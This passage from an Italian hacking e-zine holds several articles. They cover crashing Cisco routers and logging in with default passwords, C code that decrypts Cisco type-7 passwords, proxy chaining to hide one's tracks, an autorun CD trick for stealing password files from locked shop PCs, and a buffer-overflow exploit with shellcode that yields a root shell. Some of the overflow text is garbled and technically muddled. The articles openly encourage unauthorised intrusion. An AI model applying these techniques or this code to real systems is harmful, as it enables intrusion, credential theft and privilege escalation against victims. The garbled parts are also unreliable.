'cisco router', 'router' o qualcosa di simile, avrete trovato un Cisco Router.

Ecco qui sotto un esempio che chiarirà le idee:

traceroute 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.

In questo caso, non dovrebbe esservi difficile trovare il cisco che interessa
a noi, che si trovo nella 5° riga.

Questo è il metodo più semplice per bucare un Router: ovviamente esistono
anche altri metodi, come quello di ricercare una hole nel sistema e usare
l'exploit che fa al caso vostro. Perciò armatevi del vostro Archivio Exploit
preferito e ricercate. ;-)

In ogni caso consiglio vivamente, se in futuro vi metterete in testa di bucare
un Router, di smanettare con i Cisco di qualche piccolo provider locale o di
un piccolo Server con una macchina che funga da Router. Ma NON mettetevi in
testa di bucare un Router di un grosso provider, altrimenti rischiate di
finire nella merda... Ma che ve lo dico a fare, tanto poi voi fate comunque
quel che volete... ;)


* Come attaccare un Router *

Ci sono vari modi per attaccare un Router. Quello che può essere il più facile
da applicare rimane quello descritto anche da Spider nel suo txt trattante i
Router, scritto per la Tank Commandos Crew.
Esso consiste nell'aprire una sessione telnet col Cisco individuato e nella
prime richieste inserire una enorme stringa del tipo:

4f53dg454ghsd#@@6257842890(&/89hgugdkurkjsncnvbk.rfdfgy77y04n/*-+kodng52+h
8h9u-i*7d6*tg-d,.,<tusedfdifg1h7yt41htv90#g+g§gxs*gygé[husgfdes36848£$%&(89
B579%&()58/$2!gdfrcygyuse85475*7*-898i5659+*+5hbue76h905678*dgysg6323236684
yoìnb'ìì?^'ìop;5869tue7tt87659u5b*7/7*-67renyf74368hythetytt53/8g99g8gufhsy
udyt76357tvclò590iyt8c9854*7*v98h6*/79rv896/79/b96r/79try59y623*-y+hv.rfyer7
8wytr7y7ieyr7h7fdyt7yw78yt8yc8y8t5rt788g-9r+g+re9greio5487580ut05utur9tu7ur
s908'8457tu3udf89789058jfuj3'096i90'tj'4i68jv6tryf8yue8r8t8t8rt8h7ytye7tiiii
ieiyf7365tcyhv8948jfv8h4vbb49758h389579h8cuyh83hghnzhqwqskmk427hc7784

A questo punto i casi che si possono verificare sono 2:

1) Il router va offline e si riavvia automaticamente. Per provare ad
hackerarlo dovremo quindi eseguire un ping of death molto pesante verso il
Cisco, per cercare di buttarlo giù.

2) Se abbiamo molta fortuna, invece, siamo riuscito a freezare il Cisco per un
periodo di 5-10 minuti. Proprio per questo dobbiamo agire in maniera rapida e
veloce! Quindi apriamo una nuova sessione telnet, passiamo per qualche wingate
e logghiamoci con le passwd "root" o "admin". Queste sono le passwd di default
di un Cisco Router, e se abbiamo anche la fortuna di beccare un sysadmin
incompetente abbiamo la fortuna di essere dentro al sistema!

A questo punto, penso proprio che a voi interessi il file delle passwd, che
potrete crackare utilizzando il mitico John The Ripper, un Brute Force, o
meglio ancora con il sorgente del prog che vi incollerò ora qui sotto. Esso va
compilato sotto linux e può facilitare il nostro lavoro.

--- Inizia a tagliare da qui ---

#include <stdio.h>
#include <ctype.h>

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
fprintf(stdout, " %s <router config file> <output file>\n",
pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
}
}
}

--- Finisci di tagliare qui ---

Questo è tutto quello che avevo da dire per quanto riguarda come bucare un
Cisco.
Ora vedremo i comandi del Router, per poterci lavorare meglio sopra...

* Quali sono i comandi di un Cisco Router? *

Allora… In questa sezione parleremo dei comandi principali di un Cisco e ci
smanetteremo un po' sopra. Poiché la miglior teoria è la pratica, vi consiglio
vivamente di scaricarvi il "Boson Router Simulator", che potete scaricare
anche al mio sito, www.x-system.cjb.net, oppure al sito ufficiale www.
programma che ho scaricato secondo consiglio di Nobody88, noto membro degli
Spp, in un suo breve articolo su un numero dell'e-zine NewByes. Questo prog,
funzionante sotto Win, una volta installato sul vostro sistema e lanciato
simula un vero e proprio Cisco Router. Ed è mica male per imparare a
spadroneggiare con i comandi!

Io ho fatto per voi la traduzione dei Lab (i primi due... proprio le basi
insomma...), piccole guide ai comandi e alle loro funzioni, che come già detto
in precedenza sono diversi dai comandi di sistemi *nix.

Innanzitutto avviate il programma e selezionate il Router 1, con il quale noi
lavoreremo. Premete il tasto <enter> e noterete

Router>

Esso è il router prompt. A questo punto, entrato nel programma (che per noi
equivale ad essere loggati in un router remoto... ;DD), digita '?', comando
che come puoi immaginare ti mostrerà tutti i comandi disponibili nel router
con la relativa descrizione.

Poichè ora sei solo un utente, devi usare il comando 'enable' per entrare nel
router in modo privilegiato. Noterai il cmabiamento del prompt in

Router#

Penso proprio che ci voglia poco a capire il cambiamento se siete dei
linuxiani... Ad ogni modo il cambiamento del prompt significa che ora siete
utenti privilegiati (per fare un esempio, equivale al root di sistemi *nix o
al administrator di sistemi NT).
Ora, digita nuovamente '?' e noterai l'aggiunta di nuovi comandi (chissà
perchè... ;)).

Prova a digitare 'show ?' e noterai altri comandi disponibili e loro
descrizione.

Dopo aver osservato i vari comandi e magari averci smanettato un po' su,
digitate 'show running-config' per vedere ed osservare la configurazione del
vostro router (un po' malandata la configurazione... non vi pare? eheheh),
premendo il tasto space bar per completare la lettura delle informazioni.

Parliamo ora di memorie. Più precisamente di memorie flash e history. La
memoria flash è quella che contiene i files image dell'OS. La puoi vedere con
il comando 'show flash'. Esiste poi la memoria history che puoi osservare con
il comando 'show history' e contiene, di default, gli ultimi 10 comandi (vi
dovrebbe ricordare il file .history presente nelle cartelle di ogni utente in
sistemi linux...). Puoi ripercorrere la memoria history con la combinazione di
tasti <Ctrl> P e <Ctrl> N.

Parliamo ancora del comando 'show'! Un bel po' usato, non vi pare?
show protocols : ti permette di vedere lo stato corrente del tuo router.
show version : ti permette di vedere la piattaforma del router, l'os version,
numero di interfaccia, la registrazione ed altro.
show clock : ti permette di vedere l'ora e la data del tuo router.
show hosts : ti permette di vedere host ed ip address del tuo router.
show users : ti permette di vedere la lista di tutti gli utenti connessi al
tuo router.
show interfaces : ti da' le informazioni dettagliate su ogni interfaccia del
tuo router.

A questo punto, finita la sessione di lavoro puoi usare i comandi 'exit' o
'disable' (la funzione è esattamente la stessa) per tornare all'utente
precedente, ovvero l'User non privilegiato.

Bene... Credo proprio che le basi sul lavoro da poter svolgere in un Cisco
Router ce le abbiate (anzi... le abbiamo... eheheh) ma comunque un po' di
documentazione in più non vi fa male, perciò cominciate anche voi a tradurvi
le lezioni successive dei Lab presenti sul Boson Router Simulator.

* Conclusioni *

Anche stavolta ho terminato il mio lavoro... Che dirvi... Mi raccomando solo
di non fare cazzate se non sapete ciò che state facendo e se volete davvero
farlo, assicuratevi prima di avere davvero le buone competenze per riuscire
nel vostro intento. Un sito internet dove potrete trovare molta documentazione
è www.cisco.com. Visitatelo, può essere utile. Poichè non ho davvero
nient'altro da dirvi, vi saluto ed un arrivederci al prossimo testo sui Cisco
Router. ;-)


|-------------------------------------|
|Art. N° <3> : "Multiproxy" di Elektro|
|-------------------------------------|


M U L T I P R O X Y

...ovvero vi svelo quello che molti di voi mi chiedono con parecchia
insistenza da molto tempo...

Autore: Elektro
Web: www.x-system.cjb.net
Mail: teo1987@libero.it
Data: 02/12/12

Ciao a tutti! Viste le numerosissime richieste di molti di voi, eccovi una
guida al prog Multiproxy, raggiungibile all'url www.multiproxy.org. La
versione attuale, se non vado errato è la 1.2, perciò scaricatevi quella.
A mio parere Multiproxy è il miglior prog per anonimizzarsi in Rete su
piattaforme Win: impostati un determinato numero di proxy, voi potete usare
questi come 'ponti' per le connessioni dalla vostra macchina al vostro
obiettivo.
Ecco un piccolo schema che forse vi chiarirà il caos che molti di voi ora
avranno in testa:

127.0.0.1 ---> Proxy1 ---> Proxy2 ---> Proxy3 ---> Proxy4 ---> Proxy ecc.
---> Obiettivo

E l'uso non è poi così complesso come a molti di voi può sembrare.

Innanzitutto avviate Multiproxy, che in automatico proverà a testare i proxy.
Al termine di questo test, dovete controllare quali proxy sono sfruttabili e
quali invece non rispondono ai ping: per far questo andate nel menù Proxy List
---> Options ---> Proxy server list e vedrete i proxy segnalati con punti
rossi e altri con punti verdi. Quelli verdi sono quelli sfruttabili per in
nostri scopi ;) mentre quelli rossi sono da eliminare; per eliminarli andate
in Menu ---> Proxy list ---> Delete non-responding.

Se invece volete aggiungere una lista di proxy, perchè quella di default non
ha 'soddisfatto le vostre aspettative' ;) andate nuovamente su Menù ---> Files
---> Import proxy list e ripetete tutto dall'inizio per testare i nuovi proxy.
NB = Per trovare liste corpose di proxy sempre aggiornati, andate sempre
all'URL www.multiproxy.org.

Ora dovete solo configurare il vostro browser, o i programmi con i quali
volete agire nell'ombra ;), mettendo nelle impostazioni per i proxy quel che
segue:

Proxy: 127.0.0.1
Porta: 8088

Come spero abbiate capito 127.0.0.1, indica il vostro computer. Perchè allora
tutto ciò? Semplicissimo. Multiproxy al suo avvio apre nella vostra macchina
la porta 8088, la quale si collega poi ai vari proxy fino al vostro obiettivo.

Semplice vero?
Spero abbiate capito tutto... E poi questa non era una lezione difficile come
molte altre... Almeno ora ho chiarito l'utilizzo di questo prog e spero che
ora le mail con oggetto Multiproxy arriveranno in quantità più limitate... ;-))

Byez


|------------------------------------------------------------|
|Art. N° <4> : "Fregare le pass di pc protetti..." di Raptor_|
|------------------------------------------------------------|


Fregare i file di password dei pc protetti da password degli screen saver
(un nome più corto no eh??? )

[Commento di Elektro: Rap, puoi dirlo forte... Ho dovuto tagliare il titolo
ben due volte perchè non ci stava tutto... ;))]

DISCLAIMER
L'autore non si ritiene responsabile per l'uso che può essere fatto del
seguente testo in quanto è solo a scopo puramente informativo.


Autore: Raptor_
saluti & ringraziamenti: Selphi5,ciro,rafel'o matt(senza di te non mi sarei
divertito l'anno scorso rafè!!!),il mio prof di
fisica e Einstein anche se è morto... :\
Fuck: A chiunque è coinvolto negli attentati sull'america, al prof di kimika
e a molti altri.

Allora come avrete notato dal titolo questo articolo cerca di spiegare come
fregare i file di password dai pc protetti dalla password degli screen saver.
IMPORTANTE: l'idea mi è venuta leggendo una e-zine non ricordo quale cmq
grazie lo stesso.
Materiale occorrente:
un masterizzatore (qualunque va bene)
un floppy (vuoto possibilmente altrimenti dove mettete il file di password???)
un cd (io consiglio quelli piccolini da 185mb per praticità )
un amico.

ora creare un altro file da chiamare autorun.inf (già vedo che iniziate a
capire :P )

----------------------inizio autorun.inf------------------------
[autorun]
OPEN=fp.exe
-----------------------fine autorun.inf-------------------------

(il file fp.exe cioè l'allegato è un programmino che copia tutti i *.pwl che
trova in c:\windows)

Bene ora mettete questi bei due file (autorun.inf e fp.exe) su un bel cd =)
ora chiamate un vostro amico, prendete il cd e correte verso il primo
supermercato che conoscete mentre correte fermatevi, ricordatevi che vi siete
dimenticati il floppy,ritornate a casa prendete il floppy ritornate al
supermercato e mentre il vostro amico distrae l'addetto al settore magari
chiedendogli di fargli vedere qualche cosa che sta abbastanza lontano dai pc
voi inserite il floppy e il cd, così anche se il pc sarà bloccato dallo screen
saver il programma verrà eseguito ugualmente e voi avrete il file pwl nel
floppy =).
Ah dimenticavo... occhio alle telecamere.
Beh mi sembra di aver finito a presto !!!
Raptor_
rapt0rxx@hotmail.com


|-----------------------------------------------------------------------|
|Art. N° <5> : "Come è strutturato un exploit di Buffer Overflow" di e4m|
|-----------------------------------------------------------------------|

[E4M]
TEZKATLIPOKA@LIBERO.IT
BLACK FORCE CREW
#BFC ON IRC.AZZURRANET.ORG
_________________________________________

__________________________________________________________________
|"*"|Coded by e4m____________________________________________|*|-|x|
|101010101010101010101010101010101010101010101010101010101010101010|
|010101010101010101010101010101010101010101010101010101010101010101|
|010101010101010111010101001000100010100100101001010101010410101010|
|10| \ 01010101 / \101010101/ \/ \01000|
|10| ________| 01010101/ /| |01010101/ \1011|
|10| |________ 010101 / /0| |0101010| /\ /\ |100|
|01| | 101011/ /01| |0101010| /0 \ /01\ |110|
|10| ________| 10100/ /010| |0101010| |01 \/010 | |010|
|01| |0101010110101/ /0100| |0101001| |010101010| |110|
|01| |01010101010_/ \0110| \____ | |010101010| |011|_____
|10| |/ \ | \01010101/ |100|!!!!/
|01|______________/|_______ ___________||_____\010101/_____|011|!!!/
|011010010101010101011101010| |010101001010101010101010101010101|!!/
|010101011010101100100101010| |010101010101010101010101010101010|!/
|010010100101001010010101001|____|010101011101010101010101001101010|/
--------------------------------------------------------------------



________[-=COME E' STRUTTURATO UN EXPILOT SU STRUTTURA BUFFER
OVERFLOW=-]_________

Thanks to fides Rosiello Angelo refle@libero.it

-=Innazitutto,cos e un buffer overflow?=-
_________________________________________

Un buffer overflow è un traboccamento dati.
Ad esempio:

char input[] = "123456789";
char buffer[7];
strcpy(buffer, input);

In questo caso otterremo un overflow poichè i caratteri in input
immessi nel buffer sono 11, mentre è stato dichiarato il char buffer di un
massimo di 10 caratteri.

La corretta versione del programma è:

char input[] = "1234567";
char buffer[7];
strncpy(buffer, input, sizeof(buffer));

In questo caso non avremo alcun tipo di traboccamento.
Tutto consta dunque, nel fare molta attenzione durante implementazione del
software.

Cosa succede ai byte(s) in eccesso?

Nella memoria il nostro overflow appare a grandi linee così:

buffer sfp ret
[BBBBBBBBBB][xxxx][xxxx]

Questa è una parte dello stack frame. Sostanzialmente abbiamo 10 bytes di
buffer, 4 bytes dello Stack Frame Pointer e altri 4 di Indirizzo di ritorno.

Ad esempio:

strcpy(one, two);
printf("String copied.\n");

quando strcpy() è richiamato nel codice e termina la sua funzione, il
programma rimanda l'esecuzione all'indirizzo di ritorno posto nello stack
frame.
Ora pensiamo se si riuscisse ad eseguire qualche altro passo invece di
ritornare ad eseguire lo strcpy(), di saltare cioè ad un indirizzo che noi
assegnamo.
Facciamo ipotesi che il programma sia di proprietà root (uid 0) e che sia
suid +s. Se l'indirizzo di ritorno potesse essere reindirizzato allo
shell code.. beh il gioco è fatto :> !

Guardiamo Lo Stack Frame nella memoria quando copiamo 18 bytes nel buffer
invece di 10. Nell'esempio seguente viene effettuato uno strcpy() di 18
'd' nel buffer.

buffer sfp ret
[dddddddddd][dddd][dddd]

In questo esempio l'indirizzo di ritorno è 0x64646464 dove 0x64 è il
codice ascii della lettera 'D'.

Ovviamente possiamo raggiungere qualsiasi indirizzo di ritorno avvalendoci
dell'uso dei NULL. Un qualsiasi data's string è terminato da un NULL,
quindi se poniamo l'indirizzo di ritorno come 0x64006464, questo dovrebbe
ottenere il NULL come la fine della stringa e la restante parte 6464 non
dovrebbe essere copiata nel buffer. Questo succede con ogni data segment
che applichiamo al buffer.

-=Lo Stack Pointer.=-
_____________________

Qualsiasi programma ha un stack pointer che è l'indirizzo iniziale dello
stack.
E' possibile trovare lo Stack Pointer di un sistema usando il seguente
codice:

unsigned long sp(void) {
__asm__("movl %esp, %eax"); }

void main(void) {
printf("0x%x\n", sp());
}

La funzione sp() contiene l'istruzione assembler che copia il valore dello
stack pointer (registro eax), nel buffer di ritorno (registro esp),
stampandolo.

$ ./sp
0xbfbffbc8
$

Okay! Ora sappiamo che lo stack pointer è 0xbfbffbc8, ciò significa che se
scrivessimo un programma, qualsiasi variabile dichiarata sarebbe allocata
nell'indirizzo di memoria immediatamente successivo a questo indirizzo.
Con un po' di tentativi assistiti dalla fortuna è così possibile trovare
l'indirizzo di un buffer all'interno della memoria.

-=Shellcode=-
_____________

Per comprendere bene cosa è uno shellcode è necessario avere delle buone
basi di assembler, ecco perchè preferisco non approfondire troppo
l'argomento, potremmo rischiare di divagare. Lo shellcode è un semplice
programma in assembler che esegue una shell (/bin/sh).

Un esempio di shell code è:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x50\x53\x50\x54\x53\xb0\x3b\x50\xcd\x80

-=Come e fatto un expilot=-
___________________________

Debbuggiamo questo di Rosiello Angelo tnx!

1) /* programma vulnerabile.c */

int main(int argc, char *argv[]) {
char buffer[500];
if(argc>=2) strcpy(buffer, argv[1]);
return 0;
}

Come e possibile vedere questo programma andrà in overflow se scriviamo
più di 500 caratteri come primo argomento.

Ecco il file che manderà in overflow il nostro programmino!

2) /* overflow.c */

void main() {
char buffer[501];
memset(&buffer, 'a', sizeof(buffer));
execl("./vulnerable", "vulnerable", buffer, 0); }


$ gcc -o overflow overflow.c
$ ./overflow
Bus error

$

Per completare l'exploit e necessario ora far eseguire lo shellcode.
Dobbiamo ricordare che lo stack pointer punta all'inizio dello stack,
quindi l'indirizzo del buffer deve essere molto prossimo a questo.
Ma come facciamo a sapere esattamente a quale indirizzo saltare? Non è
possibile in effetti saperlo a priori, ma l'uso del NOP può facilitarci il
compito.

Un NOP è un istruzione \x90 in assembler che non fa nulla e passa
all'istruzione successiva. I NOP in effetti sono spesso utilizzati per
realizzare delays.

Come possiamo utilizzare questi NOP?
Bene noi dobbiamo effettuare un salto all'inizio del buffer del nostro
programma vulnerabile per eseguire lo shellcode, ma non sappiamo
esattamente dove saltare. Ma se i primi 200 bytes del buffer fossero NOP
prima dello shellcode ? Allora potremmo saltare ad ogni posizione nel
buffer finchè non viene raggiunto ed eseguito lo shellcode!
Con questo sistema abbiamo solo bisogno di sapere in linee generali
dove è il buffer, per raggiungere lo stack pointer e sottrargli un offset
con un incremento di 30 o 40, finchè non raggiungiamo un NOP nel buffer.

Introduciamo noi un buffer nel codice dell'exploit di 600 bytes e una
linea di comando che ci consente di specificare l'offset dello stack
pointer.

/* exploit.c */

#include <stdlib.h>

#define BUFFERSIZE 600 /* vulnerable buffer + 100 bytes */

/* shellcode for freebsd (*bsd?) */
char bsdshell[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";

/* linux x86 shellcode */
char lunixshell[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x$
"
\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\x$
"\x80\xe8\xde\xff\xff\xff/bin/sh";

unsigned long sp(void)
{
__asm__("movl %esp, %eax");
}

void usage(char *cmd) {
printf("\nusage: %s <offset> <os>\n\n", cmd);
printf("OS types are: 1. FreeBSD (*bsd?) 2. Linux\n\n");
exit(-1); }

int main(int argc, char *argv[])
{
int i, offset, os;
long esp, ret, *addr_ptr;
char *buffer, *ptr, *osptr;

if(argc<3) usage(argv[0]); /* quit if they didnt specify an offset */

offset = atoi(argv[1]); /* get the offset they specified */
esp = sp(); /* get the stack pointer */
ret = esp-offset; /* sp - offset = return address */
os = atoi(argv[2]); /* get os */

if(os<1 || os>2) usage(argv[0]);

printf("Stack pointer: 0x%x\n", esp);
printf(" Offset: 0x%x\n", offset);
printf(" Return addr: 0x%x\n", ret);

/* allocate memory for our buffer */
if(!(buffer = malloc(BUFFERSIZE))) {
printf("Couldn't allocate memory.\n");
exit(-1);
}

/* fill buffer with ret addr's */
ptr = buffer;
addr_ptr = (long *)ptr;
for(i=0; i<BUFFERSIZE; i+=4)
*(addr_ptr++) = ret;

/* fill first half of buffer with NOPs */
for(i=0; i<BUFFERSIZE/2; i++)
buffer[i] = '\x90';

/* insert shellcode in the middle */
if(os == 1) {
ptr = buffer + ((BUFFERSIZE/2) - (strlen(bsdshell)/2));
for(i=0; i<strlen(bsdshell); i++)
*(ptr++) = bsdshell[i];

} else {
ptr = buffer + ((BUFFERSIZE/2) - (strlen(lunixshell)/2));
for(i=0; i<strlen(lunixshell); i++)
*(ptr++) = lunixshell[i];
}

/* call the vulnerable program passing our exploit buffer as the
argume$
buffer[BUFFERSIZE-1] = 0;

execl("./vulnerable", "vulnerable", buffer, 0);

return 0;
}


Adesso possiamo testare il nostro exploit: $ ./exploit 0 1 Stack pointer:
0xbfbffb90
Offset: 0x0
Return addr: 0xbfbffb90
#

Voilà! Ecco la nostra root!

/*
Scritto da Rosiello Angelo refle@libero.it
Anke questo tute termina qui...

[E4M]


|-------------------------------------------------------|
|Art. N° <6> : "Buffur Overflow - Esempio Chiaro" di

  
e4m|
|-------------------------------------------------------|


[E4M]
TEZKATLIPOKA@LIBERO.IT
BLACK FORCE CREW
#BFC ON IRC.AZZURRANET.ORG
_________________________________________

__________________________________________________________________
|"*"|Coded by e4m____________________________________________|*|-|x|
|101010101010101010101010101010101010101010101010101010101010101010|
|010101010101010101010101010101010101010101010101010101010101010101|
|010101010101010111010101001000100010100100101001010101010410101010|
|10| \ 01010101 / \101010101/ \/ \01000|
|10| ________| 01010101/ /| |01010101/ \1011|
|10| |________ 010101 / /0| |0101010| /\ /\ |100|
|01| | 101011/ /01| |0101010| /0 \ /01\ |110|
|10| ________| 10100/ /010| |0101010| |01 \/010 | |010|
|01| |0101010110101/ /0100| |0101001| |010101010| |110|
|01| |01010101010_/ \0110| \____ | |010101010| |011|_____
|10| |/ \ | \01010101/ |100|!!!!/
|01|______________/|_______ ___________||_____\010101/_____|011|!!!/
|011010010101010101011101010| |010101001010101010101010101010101|!!/
|010101011010101100100101010| |010101010101010101010101010101010|!/
|010010100101001010010101001|____|010101011101010101010101001101010|/
--------------------------------------------------------------------


-----------------------------------------------------------------------------------------------


_____________ ------------\
____________
| | \_____ _____-------------|-----------/ ______/ | |
>
| -+- | \/ |___________ / ______/ |___ | -+-
|
| | __ / | | ________/ ________/| ___| |
____/
| | \ --+-- | | | | | |______ | | \
| +-- | | | | | | \ | |\ \
|______|______/___________/|____| |___| <______________/ <____| \___>
< O V E R F L O W >


Da visualizzare ASSOLUTAMENTE con il carattere TERMINAL di notepad :)


Questo e' solo un semplice esempio molto piu TErRIbIlMeNtE facile della guida
inizile ..cmq li' viene descritto tutto kiaramnte ^_^
Quindi questo dovrebbe essere un +optional+

+---------------------------+
|char input[] = "123456789";|
|char buffer[7]; | <---Trabboccamento :D
|strcpy(buffer, input); |
+---------------------------+

Note:
le lettere sono bytes (1)=1byte (2)=1byte e cosi via...
*=tutti qualsiasi



Bytes trabboccati FuOrI..!!
|
|

Byte In uscita lol
-----------| / Registro I
[Puo' contenere 7bytes]
Out | ________ /
|
|-------<<<--------------------<<<---------------|--|________|/
+------Connessi
|---------->>>-------------------->>>------------|--|________|\
|
In | \
|
|-------------- rotfl \ Registro II
[Puo' contenere *bytes]
Bytes in entrata
|
|
Portano il livello del buffer
ad un aumento costante [9bytes]


rofl (ossia registro 2) accetta dati nO=9 + imput dall'utente -->+
char input[] = "123456789" ;
lol (ossia registro 1) accetta dati nO=7 + owerflovva xke -->+
char buffer[7] ;
Comandi x il buffer --->
strcpy(buffer, input) ;

--------------------------------------------------------------------------------------------------------------------


|-------------------------------------------------|
|Art. N° <7> : "Ritornando all'overflow..." di e4m|
|-------------------------------------------------|


[E4M]
TEZKATLIPOKA@LIBERO.IT
BLACK FORCE CREW
#BFC ON IRC.AZZURRANET.ORG
_________________________________________


ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°°ÛÛÛÛÛÛÛ°°°°°°°°Û°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°ÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°Û°°°ÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛ°°°ÛÛÛÛÛ°ÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°°°ÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°°°°ÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°ÛÛÛ°°°°ÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ

..proudly presents..


Per la visione di questo tute e' CONSIGLIATO IL CARATTERE terminal per
visualizzare anke gli ascii correttamente!



Progammando in vba...
alla fine son riuscito a scrivere un owerflow attraverso una progressbar
che trabbocca i dati visto ke pbar1=max(ha il len settato al max)
ma,non e' stato settato il pbar1=min
_________________________________________

Private Sub Command1_Click()
pbar1.Max = Len(cString)
pbar1.Value = nLoop
cReturn = cReturn + Caracter
End Sub

_________________________________________
VISTO IN TUTTI I LINUAGGI SI OTTIENE UN TRABBOCCAMENTO DATI,KE NON E' ALTRO UN
ERRORE DI
BYTE IN ECCESSO...
